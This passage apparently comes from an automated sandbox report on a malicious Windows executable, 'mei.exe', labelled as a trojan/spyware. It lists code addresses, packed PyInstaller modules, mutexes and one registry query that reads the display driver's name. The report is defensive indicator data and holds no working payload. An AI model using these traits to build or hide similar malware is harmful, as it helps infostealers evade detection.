              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F804089_2_00007FF7D79F8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D303089_2_00007FF7D79D3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79EC05C89_2_00007FF7D79EC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F007489_2_00007FF7D79F0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79FC00C89_2_00007FF7D79FC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A2DFD889_2_00007FF7D7A2DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A04FE889_2_00007FF7D7A04FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F5F4C89_2_00007FF7D79F5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A2AF9089_2_00007FF7D7A2AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0EEA489_2_00007FF7D7A0EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79C9EFC89_2_00007FF7D79C9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79FAF0C89_2_00007FF7D79FAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0AE5089_2_00007FF7D7A0AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CCE8489_2_00007FF7D79CCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A1FE7489_2_00007FF7D7A1FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D8E6889_2_00007FF7D79D8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A11DCC89_2_00007FF7D7A11DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D1E0489_2_00007FF7D79D1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CEE0889_2_00007FF7D79CEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79F0D2089_2_00007FF7D79F0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A09D7489_2_00007FF7D7A09D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CDD0489_2_00007FF7D79CDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A16D0C89_2_00007FF7D7A16D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E9D0C89_2_00007FF7D79E9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79D8C3089_2_00007FF7D79D8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A05C8C89_2_00007FF7D7A05C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A19B9889_2_00007FF7D7A19B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A04B3889_2_00007FF7D7A04B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A2AAC089_2_00007FF7D7A2AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79CCB1489_2_00007FF7D79CCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A05A7089_2_00007FF7D7A05A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79FFA6C89_2_00007FF7D79FFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79C49B889_2_00007FF7D79C49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A069FD89_2_00007FF7D7A069FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79FD91C89_2_00007FF7D79FD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79ED97C89_2_00007FF7D79ED97C
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FF6313D2AD0 appears 47 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF1BFEC0 appears 38 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF198E10 appears 128 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038CDA1 appears 923 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038D551 appears 58 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038CE79 appears 33 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038D545 appears 35 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF199D60 appears 155 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0031132A appears 367 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFDFF198C40 appears 31 times
              Source: C:\Users\user\Desktop\mei.exeCode function: String function: 00007FFE0038CD8F appears 251 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: String function: 00007FF7D7A049F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: String function: 00007FF7D79D8444 appears 48 times
              Source: mei.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-fibers-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
              Source: mei.exeBinary or memory string: OriginalFilename vs mei.exe
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs mei.exe
              Source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000000.1647251491.00007FF631412000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameosk.exej% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mei.exe
              Source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1653092654.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs mei.exe
              Source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mei.exe
              Source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1654022915.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs mei.exe
              Source: mei.exe, 00000001.00000002.2041705452.00007FFE1026C000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2042372458.00007FFE11EE2000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2043335080.00007FFE1A467000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mei.exe
              Source: mei.exe, 00000001.00000002.2037748628.00007FF631412000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameosk.exej% vs mei.exe
              Source: mei.exe, 00000001.00000002.2042727147.00007FFE130CC000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs mei.exe
              Source: mei.exe, 00000001.00000002.2042548840.00007FFE12E1C000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041231077.00007FFE0EB62000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs mei.exe
              Source: mei.exe, 00000001.00000002.2039946476.00007FFDFB89B000.00000004.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs mei.exe
              Source: mei.exe, 00000001.00000002.2040814133.00007FFE00812000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs mei.exe
              Source: mei.exe, 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041445670.00007FFE101E3000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041984665.00007FFE10318000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2041036695.00007FFE0E182000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mei.exe
              Source: mei.exe, 00000001.00000002.2039113179.00007FFDFB289000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs mei.exe
              Source: mei.exe, 00000001.00000002.2042164190.00007FFE11EB8000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mei.exe
              Source: C:\Users\user\Desktop\mei.exeSection loaded: python3.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971625026106934
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
              Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winEXE@174/116@3/2
              Source: C:\Users\user\Desktop\mei.exeCode function: 0_2_00007FF6313D8510 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF6313D8510
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D7A0B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,89_2_00007FF7D7A0B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79DEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,89_2_00007FF7D79DEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeCode function: 89_2_00007FF7D79E3144 GetDiskFreeSpaceExW,89_2_00007FF7D79E3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8488:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8800:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_03
              Source: C:\Users\user\Desktop\mei.exeMutant created: \Sessions\1\BaseNamedObjects\W
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8876:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
              Source: C:\Users\user\Desktop\mei.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74682Jump to behavior
              Source: mei.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
